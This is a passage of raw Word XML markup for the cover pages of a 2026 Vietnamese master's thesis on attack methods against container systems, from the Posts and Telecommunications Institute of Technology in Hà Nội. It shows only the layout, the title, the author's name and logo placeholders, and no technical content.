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9"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3"/>
        <w:gridCol w:w="3560"/>
        <w:gridCol w:w="47"/>
        <w:gridCol w:w="5656"/>
        <w:gridCol w:w="153"/>
      </w:tblGrid>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00CE6B49" w14:paraId="62B13604" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="17"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3607" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D60ADAE" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="003B15FC" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5809" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40F3C3F4" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00CE6B49" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="0290ABFC" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="1070"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43721124" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="0099472A" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00622089">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A087C2E" w14:textId="49B011ED" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="00A95152" w:rsidP="00A95152">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00314655">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                                   </w:t>
            </w:r>
            <w:r w:rsidR="002052C6" w:rsidRPr="00A1209F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>---------------------------------------</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="5F07EB31" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="1946"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="032289AA" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE605B">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="680AC4F0" wp14:editId="30656EF5">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2404644</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>194502</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="980237" cy="1287520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="6" name="Picture 6"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EE6830A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0237" cy="1287520"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="3D43728D" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="611"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DD69CA0" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="0099472A" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="003B799D" w14:paraId="765A5660" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="611"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F8E6F8D" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="003B799D" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii=".VnTimeH" w:hAnsi=".VnTimeH"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="4CD59160" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="611"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02B09F22" w14:textId="1DBD0A67" w:rsidR="002052C6" w:rsidRPr="0099472A" w:rsidRDefault="002F69C0">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A95152">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NGUYỄN TUẤN ANH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00991B8C" w14:paraId="2D7A5C9D" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="520"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3836E84B" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00220D25" w:rsidRDefault="002052C6" w:rsidP="00220D25">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="0B72CCC2" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="58"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A3FC4EE" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="1AC96C4D" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="1895"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="373F8476" w14:textId="0017CAE9" w:rsidR="002052C6" w:rsidRPr="00E96BDF" w:rsidRDefault="00E96BDF" w:rsidP="00E96BDF">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E96BDF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>NGHIÊN CỨU PHƯƠNG THỨC TẤN CÔNG VÀO HỆ THỐNG CONTAINER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="5CE781EE" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="520"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C4C79C0" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00991B8C" w14:paraId="4D87B3A8" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="550"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="387076BB" w14:textId="17C4CBDF" w:rsidR="002052C6" w:rsidRPr="00E96BDF" w:rsidRDefault="00E96BDF" w:rsidP="00E96BDF">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E96BDF">
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>ĐỀ ÁN TỐT NGHIỆP THẠC SĨ KỸ THUẬT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0099472A" w14:paraId="366F5488" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="2136"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A04180F" w14:textId="1D9534D0" w:rsidR="002052C6" w:rsidRDefault="00E96BDF" w:rsidP="00E96BDF">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>(Theo định hướng ứng dụng)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1BE419" w14:textId="494D4397" w:rsidR="002052C6" w:rsidRPr="0099472A" w:rsidRDefault="002052C6" w:rsidP="00507492">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="438D3336" w14:textId="64D2803F" w:rsidR="00507492" w:rsidRPr="0099472A" w:rsidRDefault="00507492" w:rsidP="00507492">
            <w:pPr>
              <w:spacing w:before="140" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0099472A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>HÀ NỘI-202</w:t>
            </w:r>
            <w:r w:rsidR="00E96BDF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0A5518" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="0099472A" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="0018320D" w14:paraId="4C56D1A7" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3713" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BF87232" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="005C7263" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5703" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0541E765" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="0018320D" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="2ACE860D" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="39B5C3D8" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00CE6B49" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D26F696" w14:textId="6FEA74E1" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="0017031B" w:rsidP="0017031B">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00314655">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                                   </w:t>
            </w:r>
            <w:r w:rsidR="002052C6" w:rsidRPr="00A1209F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>---------------------------------------</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00A1209F" w14:paraId="2DA3DD3B" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="1431"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4FF964FB" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="00A1209F" w:rsidRDefault="002052C6">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE605B">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2234F1ED" wp14:editId="5E80BA85">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2376805</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>160934</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="980237" cy="1287520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="1483975137" name="Picture 1483975137"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EE6830A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0237" cy="1287520"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00AD11E6" w14:paraId="5CA2E604" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3148285B" w14:textId="77777777" w:rsidR="00C20F4D" w:rsidRDefault="00C20F4D">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="026AF76E" w14:textId="594ED778" w:rsidR="002052C6" w:rsidRPr="00AD11E6" w:rsidRDefault="0017031B" w:rsidP="0017031B">
            <w:pPr>
              <w:spacing w:before="140"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">                                                  </w:t>
            </w:r>
            <w:r w:rsidR="00AE74B2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NGUYỄN TUẤN ANH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002052C6" w:rsidRPr="00AD11E6" w14:paraId="0828FE45" w14:textId="77777777" w:rsidTr="002052C6">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="153" w:type="dxa"/>
          <w:cantSplit/>
          <w:trHeight w:val="648"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9416" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
